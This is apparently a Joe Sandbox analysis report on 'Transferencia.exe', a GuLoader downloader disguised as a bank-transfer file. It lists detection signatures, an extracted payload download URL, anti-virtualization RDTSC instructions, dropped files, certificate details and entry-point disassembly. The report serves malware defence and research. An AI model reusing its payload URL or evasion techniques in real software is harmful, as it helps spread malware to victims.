Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Transferencia.exe

Overview

General Information

Sample Name:Transferencia.exe
Analysis ID:624276
MD5:fb1d131568bdd2fa951608534f83a75c
SHA1:ff02df2cb07c221b8ed3583c6dafb8c0e35684f8
SHA256:42625067621ac2dba6b95e565a48454637f46185356034da214a00a3d453c971
Tags:exe
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Transferencia.exe (PID: 4736 cmdline: "C:\Users\user\Desktop\Transferencia.exe" MD5: FB1D131568BDD2FA951608534F83A75C)
  • cleanup
{"Payload URL": "https://drive.google.com/uc?export=download&id=1hB?$1A"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.756250628.0000000002D50000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000000.00000002.756250628.0000000002D50000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1hB?$1A"}
    Source: Transferencia.exeReversingLabs: Detection: 26%
    Source: Transferencia.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Transferencia.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1hB?$1A
    Source: Transferencia.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056BB
    Source: Transferencia.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Transferencia.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_732A1BFF0_2_732A1BFF
    Source: Transferencia.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\Transferencia.exeProcess Stats: CPU usage > 98%
    Source: Transferencia.exeReversingLabs: Detection: 26%
    Source: C:\Users\user\Desktop\Transferencia.exeFile read: C:\Users\user\Desktop\Transferencia.exeJump to behavior
    Source: Transferencia.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Transferencia.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Transferencia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
    Source: C:\Users\user\Desktop\Transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nsnC5D7.tmpJump to behavior
    Source: C:\Users\user\Desktop\Transferencia.exeFile written: C:\Users\user\AppData\Local\Temp\FJERKRFARMENES.iniJump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@1/3@0/0
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\Transferencia.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404967
    Source: Transferencia.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.756250628.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_732A30C0 push eax; ret 0_2_732A30EE
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_732A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_732A1BFF
    Source: C:\Users\user\Desktop\Transferencia.exeFile created: C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\Transferencia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\Transferencia.exeRDTSC instruction interceptor: First address: 0000000002D6467E second address: 0000000002D6467E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F04749FF19Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\Transferencia.exeAPI call chain: ExitProcess graph end nodegraph_0-4339
    Source: C:\Users\user\Desktop\Transferencia.exeAPI call chain: ExitProcess graph end nodegraph_0-4495
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_732A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_732A1BFF
    Source: C:\Users\user\Desktop\Transferencia.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    1
    Access Token Manipulation
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS Memory3
    File and Directory Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Transferencia.exe27%ReversingLabsWin32.Trojan.Generic
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorTransferencia.exefalse
      high
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:624276
      Start date and time: 11/05/202213:17:052022-05-11 13:17:05 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 14s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Transferencia.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:29
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.evad.winEXE@1/3@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 63.2% (good quality ratio 62%)
      • Quality average: 88.3%
      • Quality standard deviation: 21.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 38
      • Number of non-executed functions: 34
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, time.windows.com, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      No simulations
      No context
      No context
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dllEPAYMENT.exeGet hashmaliciousBrowse
        EPAYMENT.exeGet hashmaliciousBrowse
          xcVh7ZmH4Y.exeGet hashmaliciousBrowse
            OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
              xcVh7ZmH4Y.exeGet hashmaliciousBrowse
                3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                  3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                    file.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                          Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                            7RsSycKaNc.exeGet hashmaliciousBrowse
                              7RsSycKaNc.exeGet hashmaliciousBrowse
                                potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                  potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                    Docs advice copy.exeGet hashmaliciousBrowse
                                      Docs advice copy.exeGet hashmaliciousBrowse
                                        Transferencia desde ING.exeGet hashmaliciousBrowse
                                          Transferencia desde ING.exeGet hashmaliciousBrowse
                                            shipping document.exeGet hashmaliciousBrowse
                                              Process:C:\Users\user\Desktop\Transferencia.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):163440
                                              Entropy (8bit):7.327257313432124
                                              Encrypted:false
                                              SSDEEP:3072:TAJ8oRPFQ7IfdpA9PCAHmkvLl75I504TTRajaO7HlnKEmou:Mmcd2nGkvLI504TTIb7Fbmou
                                              MD5:12189C0F205D353F5492E0231A237B97
                                              SHA1:0ADAC1C37C0B1D812B77FA9466E501B068802061
                                              SHA-256:4C5C37CDD6B432A2E245CB3E4D5E31919BBA8A9A7246769A40E781EA4A407D71
                                              SHA-512:B67C7470BB1D1898A6233DF1D61034A76BC9A862A97C885CE9312A1FF318D0D1C7BBF228FB8E0846D3BAA5AC14751F562943356305569C9DF88F8449B70D7DC8
                                              Malicious:false
                                              Reputation:low
                                              Preview:.E.S..$.......B...^... ..u.H...&..t.....14.x].....}N..+.G.....Tp.$..{S...`).....b..Av.......X..n....^.IO`lw.(..........G..).=.<.B...8.t.&.iy.../R8...W..Ji........cF...(.E..{c......B*>y..6.......1f.r../.....\.@..2J...w.....0.8..D.;.<de..p.G.i....'...*.&.B..W<..I2.......!..w&.=I.P..x..e.kH......K.......[*..9..3....(...,..T.i.JP.W.%w.w=..r.w7X... 6.....Z...Q..bN..H..<..d..Q7...w..?.. Q......Y[g._....e...%m+6k.h.oT.\..aF.(..%....k..*L.....O..........B........ .....B..9."....w. ..s..a....U@....N..(}.}D....8 ..k..Rp..\.1..).4.]{..9..&.X._...t}...v.1...p%Ts.B-'...`_>......0.<1..Cqd....l'.....c.}8XB..8..,.m6Zm.v..X+..wG.pq...MY`.g....hX..........2..%.G.O....h....I...G....c......J_.pF|;f.v.....X.i......b....7d.%...24..s..h......v`...M7....o.`....&..,.E.0:.u...F....q.;..n..,..s.-.r*..........S.m...5.+.U.....~.h7.Z..sX..>"...zU.g1<.hA...../%......N.G.n?..FJ.v.....k...$.X.LCN..T.^O..)..=.l..e,.P.*+xuF...Q.D..qC6...jr..I..7...Et...VV ..d1...2_W..Y&.;.
                                              Process:C:\Users\user\Desktop\Transferencia.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):35
                                              Entropy (8bit):4.193429088311724
                                              Encrypted:false
                                              SSDEEP:3:Nn4y2XEIIz4Acv:t12ez4Acv
                                              MD5:459F02DD36C8D63BCDF3A4078AEBD592
                                              SHA1:C61BA4265FB1C24ED73775149BB1F9A62B688CC9
                                              SHA-256:428CF1D18B7B06811B313C57DF8D240EB44350F63336BD2822B3477525C8BC1A
                                              SHA-512:A90C2BF7B01C34C5E6E16BA0391258942EDE941424BEF83398F5FE6F8936D75AD68148787F51AE80E03F565D6533811726D8C958888DE02738F514383AA7F7F6
                                              Malicious:false
                                              Reputation:low
                                              Preview:[surucucu]..Lockram2=strandlberen..
                                              Process:C:\Users\user\Desktop\Transferencia.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                              • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                              • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                              • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                                              • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                              • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                              • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                              • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                              • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                              • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                              • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                              • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                              • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                              • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                              • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                              • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                              • Filename: shipping document.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.5547497516761295
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Transferencia.exe
                                              File size:254208
                                              MD5:fb1d131568bdd2fa951608534f83a75c
                                              SHA1:ff02df2cb07c221b8ed3583c6dafb8c0e35684f8
                                              SHA256:42625067621ac2dba6b95e565a48454637f46185356034da214a00a3d453c971
                                              SHA512:ef46d1fc90b046234a2939d1cbbadeb99cca056bfba74b3b1480af1a1171698a436cc23a809c8f0ec9f2ce5ca45d91db31151311415ed38a137070924476dc10
                                              SSDEEP:6144:s3yztNlmkDzzo+3sYIEJwqq1XPo6BktVrQGs20z:s3+FvzxsPXj1/o6Aiz
                                              TLSH:2344D01E3225C4E6F88883765F3A9B0B198FAC03219105177772BBB99B39383C95F5D5
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....
                                              Icon Hash:8803969c49c2c3c0
                                              Entrypoint:0x40350a
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                              Signature Valid:false
                                              Signature Issuer:CN=&#34;Talonen Pral NONPERFECTIBILITY Unmigrant6 &#34;, O=ORDLYDEN, L=Bourg-Saint-Maurice, S=Auvergne-Rh&#195;&#180;ne-Alpes, C=FR
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 5/10/2022 12:58:17 PM 5/10/2023 12:58:17 PM
                                              Subject Chain
                                              • CN=&#34;Talonen Pral NONPERFECTIBILITY Unmigrant6 &#34;, O=ORDLYDEN, L=Bourg-Saint-Maurice, S=Auvergne-Rh&#195;&#180;ne-Alpes, C=FR
                                              Version:3
                                              Thumbprint MD5:C01462F3E1A1421FC7156C98C104EC74
                                              Thumbprint SHA-1:92A7393883A3AF47A744D137119C6E6BAEA9BC27
                                              Thumbprint SHA-256:41ACF6A35BC3571C0748976A332965863E86A47C8FBBED9FE240EE0D66E8DEA9
                                              Serial:F7E6FA3055C43850
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A2E0h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080CCh]
                                              mov esi, dword ptr [004080D0h]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007F0474C9CC0Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007F0474C9CBDAh
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [007A8B18h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3da0000x139f0.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x3da380x6c8.data
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x66700x6800False0.667931189904data6.43600264122IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x39eb780x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x3a90000x310000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x3da0000x139f00x13a00False0.570872312898data6.54983643379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x3da3580x8592PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                              RT_ICON0x3e28f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964863EnglishUnited States
                                              RT_ICON0x3e6b180x25a8dataEnglishUnited States
                                              RT_ICON0x3e90c00x1a68dataEnglishUnited States
                                              RT_ICON0x3eab280x10a8dataEnglishUnited States
                                              RT_ICON0x3ebbd00x988dataEnglishUnited States
                                              RT_ICON0x3ec5580x6b8dataEnglishUnited States
                                              RT_ICON0x3ecc100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                              RT_DIALOG0x3ed0780x100dataEnglishUnited States
                                              RT_DIALOG0x3ed1780x11cdataEnglishUnited States
                                              RT_DIALOG0x3ed2980xc4dataEnglishUnited States
                                              RT_DIALOG0x3ed3600x60dataEnglishUnited States
                                              RT_GROUP_ICON0x3ed3c00x76dataEnglishUnited States
                                              RT_VERSION0x3ed4380x274dataEnglishUnited States
                                              RT_MANIFEST0x3ed6b00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
